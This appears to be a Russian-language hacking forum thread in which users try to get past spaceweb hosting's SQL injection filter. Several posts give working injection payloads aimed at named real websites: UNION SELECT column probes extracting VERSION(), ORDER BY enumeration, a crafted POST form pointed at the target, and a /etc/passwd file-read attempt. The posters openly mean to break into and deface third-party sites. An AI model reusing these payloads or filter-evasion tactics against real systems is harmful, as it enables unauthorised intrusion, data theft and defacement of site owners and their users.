|
Чёртов spaceweb
Не нащёл куда нажаловаться такчто пишу сюда :D
В общем сайты которые висят на этом хостинге никак неполучается сломать, чуть что-то нетак в SQL запросе и кадает на http://2.sweb.ru/insecure :mad: Я ваще думал что обойти никак низя, но нащёл сайт с SQL inj висящий на этом хостинге и задефейсеный :confused: МБ другая дыра там была, но я склоняюсь к скуле... В общем вот дырко Код:
http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()/*Возможно-ли это ваще... |
Анти-Фильтрация или Обход фильтрации запрещенных слов в MySQL:
https://forum.antichat.ru/thread56409-sweb.html |
Ёлки, sweb... Я всё рыл на spaceweb =\
Спасибо |
это не там где только гет фильтруеЦЦо
it's my, гы твой пост не посмотрел... |
Эх! Прочитал я тему и был уверен что всё получится... А нет...
Навоял такую форму Код:
<form method="post" action="http://www.flotov.net/log.php">Код:
bdc26a63b13ccabfd478f160e46da358Код:
bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*Код:
http://www.flotov.net/log.php?id=bdc26a63b13ccabfd478f160e46da358'+ORDER+BY+1/*[Update] Щас подумал, мб вы имеете в виду Код:
<form method="post" action="http://www.flotov.net/log.php?id=1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,VERSION()+FROM+Users/*">P.S. Я звеняюсь, но я сваливаю спать, буду вечером :o |
http://mebel.org.ua/cgi-bin/post.php
Всё нормально работает, только вот таблицы не подобрал |
http://www.flotov.net/log.php?id=/etc/passwd
:D |
Пилять, и в чём была моя ошибка, почему у меня не получалось? :mad:
|
| Время: 09:26 |